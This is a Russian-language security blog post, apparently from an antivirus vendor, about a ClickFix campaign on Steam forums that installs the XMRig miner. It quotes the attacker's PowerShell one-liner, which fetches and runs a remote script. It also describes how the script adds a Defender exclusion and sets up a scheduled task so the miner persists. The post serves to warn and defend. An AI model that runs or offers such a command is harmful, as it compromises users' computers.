В этом году мы наблюдаем настоящий расцвет атак с использованием техники ClickFix. Она стала настолько популярна среди преступников, что только мы успеваем опубликовать пост об очередной ее вариации, как уже пора писать следующий.
В этот раз злоумышленники используют ClickFix для атак на геймеров: технологические журналисты обнаружили сообщения с вредоносными советами на форумах Steam. Рассказываем, как выглядят подобные сообщения, какое вредоносное ПО распространяют злоумышленники с их помощью и как защитить свое устройство.
ClickFix добрался до форумов Steam
Многие геймеры обращаются за помощью и советом к своим собратьям по игровой клавиатуре на форумах Steam. На них расскажут, как пройти сложный квест, правильно прокачать персонажа, получить наиболее привлекательный лут — или обойти баг. Доверием геймеров к советам с этих форумов и решили воспользоваться злоумышленники.
Начинается атака с ответа преступников на вопрос пользователя, связанный с вылетами игры, пропавшими предметами в инвентаре или другими техническими проблемами. Под видом полезного совета злоумышленники рекомендуют открыть PowerShell от имени администратора и выполнить команду, которая якобы должна устранить проблему.

Под видом совета по устранению проблемы злоумышленник предлагает запустить PowerShell от имени администратора и выполнить команду, которая якобы должна исправить ошибку. Источник
Как легко догадаться, исполнение вредоносной команды приводит совсем не к желаемому результату — решению проблемы — а к букету иных неприятностей. В этом и заключается идея техники атаки ClickFix. С помощью методов социальной инженерии преступники убеждают жертву своими руками совершить небезопасные действия и помочь им скомпрометировать ее устройство. Ранее мы уже рассказывали о поддельных CAPTCHA, фальшивых ошибках браузера и других уловках ClickFix — во всех случаях преступники вынуждают жертву самостоятельно запустить вредоносную команду. Подробнее о разных вариациях атаки ClickFix читайте в нашем посте.
Особая «прелесть» использования ClickFix на форумах Steam состоит в том, что «советом» может воспользоваться не только тот игрок, которому он непосредственно адресован, но и масса других геймеров, столкнувшихся с подобной проблемой и обнаруживших ответ на свой вопрос при поиске в Google.
Немного теории: что скрывается за командой irm | iex
Прежде чем рассказать, что же злоумышленники заставляют геймеров таким образом установить на свои устройства, придется разобраться в некоторых технических моментах. В своих сообщениях на форумах Steam они рекомендуют будущим жертвам запустить в PowerShell следующую команду:
irm msfconfig.icu | iex
Для пользователя, не знакомого с командами PowerShell, эта строка может выглядеть достаточно невинно — больше всего она похожа на запуск MSConfig, штатной утилиты Windows для настройки системы, с какими-то дополнительными параметрами.
Однако на деле все совсем не так безобидно. Давайте разберемся, что представляет собой каждый из элементов данной строки.
- irm — сокращение для встроенной команды PowerShell, полное название которой — Invoke-RestMethod. Эта команда обращается по указанному далее в строке веб-адресу и получает от него в ответ некие данные.
- icu — это, собственно, тот адрес, по которому команда irm запросит данные, а вовсе не имя какого-то локального файла, как это может показаться. Сервер злоумышленников, расположенный по данному адресу, в качестве ответа на запрос irm возвращает вредоносный PowerShell-скрипт.
- iex — другая встроенная команда PowerShell: Invoke-Expression. Эта команда выполняет тот ответ, который получает irm по указанному веб-адресу как код PowerShell.
В итоге после запуска данная строка PowerShell-кода загружает скрипт с указанного сайта и сразу же его запускает. Как справедливо отмечает пользователь Reddit, чтобы понять, какой же код будет загружен на устройство без риска его выполнения, достаточно лишь удалить второй элемент — iex.
После этого команда лишь загрузит содержимое скрипта и выведет его в окно PowerShell, но не станет его выполнять. При этом перед пользователем откроется полная версия кода, который ему предлагается запустить на своем устройстве. В следующей части обсудим, что же пытаются таким образом запустить на устройствах геймеров «помощники» с форумов Steam.
Вместо оптимизации — криптомайнер
Злоумышленники хорошо подготовились: загружаемый с их сервера PowerShell-скрипт достаточно убедительно имитирует работу утилиты для оптимизации работы Windows. После запуска скрипт показывает пользователю уведомления о том, что якобы очищает временные файлы, сбрасывает DNS-кэш, обновляет драйверы, проверяет диск на наличие ошибок, отключает ненужные программы из автозагрузки, сканирует систему на вредоносное ПО, восстанавливает образ Windows и проверяет целостность системных файлов.

Скрипт последовательно выводит сообщения о различных операциях по «оптимизации» системы, создавая впечатление, что на компьютере выполняется полезное обслуживание. Источник
Реальная же активность происходит на заднем плане. Сначала скрипт проверяет, запущен ли он с правами администратора. Если права администратора есть, скрипт создает на компьютере скрытую рабочую папку C:WindowsBackground и добавляет ее в список исключений Microsoft Defender. После этого файлы, которые будут помещены в эту папку, перестают проверяться встроенным антивирусом Windows.
Затем скрипт подготавливает систему к загрузке следующего этапа атаки и скачивает с сервера злоумышленников исполняемый файл. Затем он сохраняет его в ранее созданную папку C:WindowsBackground под внушительным именем system.exe.
Загруженный файл представляет собой XMRig — одну из самых популярных программ для майнинга криптовалюты Monero. Сам по себе XMRig не является вредоносным ПО: это легитимный инструмент с открытым исходным кодом, который используют для добычи криптовалюты. Однако злоумышленники устанавливают его на компьютеры жертв без их ведома. В результате вычислительные ресурсы устройства начинают использоваться для майнинга Monero, а полученная криптовалюта достается преступникам.
В этом смысле производительные устройства геймеров особенно привлекательны для злоумышленников. Современные игровые компьютеры оснащены мощными процессорами и видеокартами, которые отлично подходят для добычи криптовалюты.
Чтобы вредоносная программа продолжала работать после перезагрузки компьютера, скрипт создает в планировщике задач Windows новую задачу XMRig-{имя компьютера}. При каждом запуске системы она автоматически запускает криптомайнер.
Как защитить свое устройство от криптомайнеров и других зловредов
К сожалению, многие геймеры не любят устанавливать защитные решения и держать их активными на своем устройстве. В первую очередь это связано с мифом «антивирус тормозит игру». В нашем блоге мы уже рассказывали об исследовании на тему влияния работающего антивируса на игровой процесс — по его результатам никакого существенного замедления замечено не было.
А вот насчет криптомайнера этого сказать нельзя — он совершенно точно ухудшает производительность устройства, а заодно и ускоряет износ его компонентов. Что делать, чтобы не подвергать риску игровой компьютер и свои игровые аккаунты?
- Не запускать на своем устройстве команды PowerShell, Terminal или командной строки, если их предлагают скопировать и выполнить незнакомые люди на форумах, в чатах или комментариях.
- Перед запуском любых непонятных команд изучить в Интернете, что они делают и каким последствиям может привести их выполнение.
- Использовать надежное защитное решение с игровым режимом, которое вовремя предупредит о попытке загрузки вредоносного ПО и заблокирует его запуск.
- Не отключать защиту на время игры. Правильный метод — использовать решения со специальным игровым режимом. Например, в защитных продуктах Kaspersky такой режим включается автоматически, когда запускается игра, и откладывает обновление антивирусных баз, показ уведомлений и регулярные проверки диска до окончания игрового процесса.
Как еще злоумышленники атакуют геймеров? Читайте в наших постах:
геймеры
Советы